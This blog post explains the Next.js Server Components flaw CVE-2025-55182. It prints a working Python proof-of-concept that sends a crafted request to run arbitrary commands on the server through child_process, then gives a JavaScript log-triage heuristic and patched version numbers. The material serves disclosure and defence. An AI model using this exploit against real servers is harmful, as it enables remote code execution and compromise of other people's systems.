Next.js RSC vulnerability: CVE-2025-55182 (CVSS 10.0) and a test script
Next.js 15 and later render with the App Router (React Server Components) by default, and CVE-2025-55182 makes it possible to send executable instructions to the server and have them run there.
Quite a few projects are built on Next.js 15 or later, including umami, lobechat and others.
For example, with the code below, if the server is running Windows, the calculator (calc) will be opened.
The fix is also simple: upgrade React and Next.js to the latest versions.
Actually I had already patched this the moment I saw the vulnerability; it was only when I later found the test script on GitHub and ran it by hand that I realised, in hindsight, how scary it was. Put that together with the recent run of outages at AWS, Cloudflare and Alibaba Cloud, and all I can say is that our Internet infrastructure really is a ramshackle operation: it runs, so that's good enough, haha
```python
# /// script
# dependencies = ["requests"]
# ///
import requests
import sys
import json

# Target base URL and the command to run come from the command line.
BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "calc"

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
        # If you don't need the command output, you can use this line instead:
        # "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

# Multipart form fields "0" and "1" as sent by the test script.
files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}
headers = {"Next-Action": "x"}

res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)
```
After upgrading, sending the request again produces this error instead:
```
Error: Failed to find Server Action "x". This request might be from an older or newer deployment.
Read more: https://nextjs.org/docs/messages/failed-to-find-server-action
at async m (xx\.next\standalone\.next\server\app\page.js:1:9014)
at async p (xx\.next\standalone\.next\server\app\page.js:2:1860)
at async L (xx\.next\standalone\.next\server\app\page.js:2:6944)
```
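Once the server is patched, the next question is whether anyone sent requests of this shape before the upgrade. The following request-triage check is an added example, not part of the original post: it flags POST requests that carry a `Next-Action` header and whose body references `__proto__` or `constructor` through the `$n:` chunk-reference syntax, or carries a `_prefix` field, the markers visible in the test script above. The assumption is that legitimate server-action payloads never contain these strings; the three sample requests are constructed, and the suspicious one omits the command string. This is a triage aid for access logs or a reverse-proxy hook, not a substitute for upgrading.

```javascript
// Added example (not from the post): triage requests by the markers seen in
// the CVE-2025-55182 test script. Heuristic only; upgrading is the real fix.

// Substrings assumed never to appear in a legitimate server-action payload.
const INDICATORS = [
  { id: 'proto-ref', re: /\$\d+:__proto__/ },          // "$1:__proto__:then"
  { id: 'ctor-ref', re: /\$\d+:constructor/ },         // "$1:constructor:constructor"
  { id: 'prefix-field', re: /"_prefix"\s*:/ },         // client-supplied "_prefix"
  { id: 'child-process', re: /child_process|execSync|mainModule/ },
];

// Case-insensitive header lookup over a plain object of headers.
function header(headers, name) {
  const want = name.toLowerCase();
  const key = Object.keys(headers).find((k) => k.toLowerCase() === want);
  return key === undefined ? undefined : headers[key];
}

// Classify one request: is it a server-action call, and which markers hit?
function inspectRequest(req) {
  const serverAction =
    req.method === 'POST' && header(req.headers, 'next-action') !== undefined;
  const indicators = INDICATORS.filter((i) => i.re.test(req.body)).map((i) => i.id);
  return { serverAction, suspicious: serverAction && indicators.length > 0, indicators };
}

// Reduce a batch of requests to the ones worth a closer look, keeping their index.
function triage(requests) {
  return requests
    .map((r, idx) => ({ idx, ...inspectRequest(r) }))
    .filter((r) => r.suspicious);
}

// Constructed sample traffic: a normal action call, a request shaped like the
// test script (command string replaced by a placeholder), and a plain GET.
const SAMPLES = [
  {
    method: 'POST',
    headers: { 'Next-Action': 'abc123', 'Content-Type': 'text/plain;charset=UTF-8' },
    body: '["hello"]',
  },
  {
    method: 'POST',
    headers: { 'next-action': 'x', 'content-type': 'multipart/form-data; boundary=b' },
    body:
      '--b\r\nContent-Disposition: form-data; name="0"\r\n\r\n' +
      '{"then":"$1:__proto__:then","status":"resolved_model",' +
      '"_response":{"_prefix":"<constructed: command omitted>",' +
      '"_formData":{"get":"$1:constructor:constructor"}}}\r\n' +
      '--b\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n--b--',
  },
  { method: 'GET', headers: {}, body: '' },
];

// Usage: print the suspicious requests from the constructed batch.
for (const hit of triage(SAMPLES)) {
  console.log(`request #${hit.idx}: ${hit.indicators.join(', ')}`);
}
```

Feeding real access logs into `triage` requires that the request body (or at least the multipart field values) was logged; many default access-log formats only record the request line and headers, in which case the `Next-Action` header on POSTs to non-action routes is the only signal left.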
Upgrade commands (pick the line matching your current minor version):
```shell
npm install next@15.0.5 # for 15.0.x
npm install next@15.1.9 # for 15.1.x
npm install next@15.2.6 # for 15.2.x
npm install next@15.3.6 # for 15.3.x
npm install next@15.4.8 # for 15.4.x
npm install next@15.5.7 # for 15.5.x
npm install next@16.0.7 # for 16.0.x
```